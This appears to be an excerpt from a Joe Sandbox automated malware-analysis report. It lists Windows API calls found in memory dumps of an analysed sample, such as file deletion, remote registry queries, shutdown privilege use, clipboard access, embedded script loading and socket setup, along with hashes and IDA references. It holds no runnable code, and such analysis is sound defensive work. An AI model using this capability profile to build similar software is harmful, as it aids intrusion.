                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01024785
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010247B2
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 010247E2
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01024803
                                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 01024813
                                                                                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0102489A
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 010248A5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 010248B0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                        • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0102A203
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0102A25E
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A269
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0102A285
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0102A2D5
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(01077B94), ref: 0102A2F3
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0102A2FD
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A30A
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A31A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0101E3B4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 83e7d8b51f0235d47d8cdd69e40acb43cbd7cfed55cd56c346187d7ddb299129
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd90be919f51f16301a8b1a3f34c7f43b2ba6767c13f6369342d7e387d9f84e5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83e7d8b51f0235d47d8cdd69e40acb43cbd7cfed55cd56c346187d7ddb299129
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F31487160022EEFDB21AFE8EC48ADE77AC9F15224F144095FA80E3580DF75DA458B14
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C99E
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0103CA09
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103CA2D
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0103CA8C
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0103CB47
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0103CBB4
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0103CC49
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0103CC9A
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0103CD43
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0103CDE2
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103CDEF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 61b26a843d35af22bd722e022b0384170da2e6a65364d1d4423a21fa4afb84d6
                                                                                                                                                                                                                                                                                                        • Instruction ID: b6b2a8701e8c35c182930f3fe6b04ba857bc74709e15e85bb75d3ef0ceb14330
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61b26a843d35af22bd722e022b0384170da2e6a65364d1d4423a21fa4afb84d6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 920262756042009FD754DF28C995E2ABBE9EF88314F08849DF48ADB262DB35ED42CF51
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101EAB0: GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0101D9CD
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0101DA88
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0101DA9B
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0101DAB8
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101DAE2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0101DAC7,?,?), ref: 0101DB5D
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0101DAFE
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101DB0F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01011D95,?,?,00000000), ref: 01012159
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,01011D95,?,?,00000000), ref: 01012160
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011D95,?,?,00000000), ref: 01012175
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,01011D95,?,?,00000000), ref: 0101217D
                                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,01011D95,?,?,00000000), ref: 01012180
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011D95,?,?,00000000), ref: 01012190
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(01011D95,00000000,?,01011D95,?,?,00000000), ref: 01012198
                                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,01011D95,?,?,00000000), ref: 0101219B
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,010121C1,00000000,00000000,00000000), ref: 010121B5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101205A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01012087
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: GetLastError.KERNEL32 ref: 01012097
                                                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0101F249
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEBD54
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEBD78
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEBEFF
                                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,010546D0), ref: 00FEBF11
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0108221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00FEBF89
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,01082270,000000FF,?,0000003F,00000000,?), ref: 00FEBFB6
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEC0CB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3bbe0dbb587e948a7e05628a94b45714b99ebb94b2b30f89719f7bef8141507e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 173c10bd8e2184ed23a34d5074abc8e72b264f825f58c5cd263dd27164622016
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bbe0dbb587e948a7e05628a94b45714b99ebb94b2b30f89719f7bef8141507e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFC12672D042C5AFDB209F6ADC41BAF7BB9EF41320F1441AAE5809B251E7358E41EB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FF56C2,?,?,00000000,00000000), ref: 01023A1E
                                                                                                                                                                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FF56C2,?,?,00000000,00000000), ref: 01023A35
                                                                                                                                                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00FF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00FB66CE), ref: 01023A45
                                                                                                                                                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00FF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00FB66CE), ref: 01023A56
                                                                                                                                                                                                                                                                                                        • LockResource.KERNEL32(00FF56C2,?,?,00FF56C2,?,?,00000000,00000000,?,?,?,?,?,?,00FB66CE,?), ref: 01023A65
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                        • Opcode ID: ae2e00d18108bfab70d3929ba71190ca421905f01a97de365a423a02401161ca
                                                                                                                                                                                                                                                                                                        • Instruction ID: 50cd83935a06f4e4b4f7f5a968e0c947eaca714c9ff04b7e4a283f64b317c81e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2e00d18108bfab70d3929ba71190ca421905f01a97de365a423a02401161ca
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30117CB4600701BFE7318BA9DE88F277BB9EFC9B50F14426DF5429A150DB76E8008B20
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 01032D45
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102EF33: GetWindowRect.USER32(?,?), ref: 0102EF4B
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 01032D6F
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 01032D76
                                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01032DB2
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 01032DDE
                                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01032E3C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 80a6d81fab4cdc53414b27bdfe0bdbe9f3e1f6224d027b8518a9611949bd13d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: cd338b5d3c7e0a96cfa4f4bac5a9dfeab1eee65f0aad731bda745ebf1efa7c6b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80a6d81fab4cdc53414b27bdfe0bdbe9f3e1f6224d027b8518a9611949bd13d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A931CF76505316ABD720EF58C848B9AB7E9FFD9314F000919F9C997180DB75E908CBD2
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0102A5BD
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0102A6D0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010242B9: GetInputState.USER32 ref: 01024310
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010242B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010243AB
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0102A5ED
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0102A6BA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 77950f83a041248914c8f4eef3277af01085ba4174af3c86f28fafeff926eb83
                                                                                                                                                                                                                                                                                                        • Instruction ID: 99862f0f3e8b647e63f38ce96bc57f253dce5f94c5386782d2ebbf049ded3783
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77950f83a041248914c8f4eef3277af01085ba4174af3c86f28fafeff926eb83
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD41C371A0021ADFDF60DFA4CD49AEEBBB4FF58310F10409AE945A31A1EB359A44CF60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,?), ref: 00FB233E
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00FB2421
                                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00FB2434
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 72e76eefd4782e3b6d7d8b35dd4d02eab95153945546e621475f777f3d834e92
                                                                                                                                                                                                                                                                                                        • Instruction ID: 97b0eb8d6494f90b797fb2a0d69a4e9409f827d943c963daa0b3df686fd40dfa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72e76eefd4782e3b6d7d8b35dd4d02eab95153945546e621475f777f3d834e92
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC814AF2608004BEE278757A8CD8FFF259DEF46360B190119F242C65A9C95D8F41FA76
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 01033AD7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: _wcslen.LIBCMT ref: 01033AF8
                                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 010322BA
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 010322E1
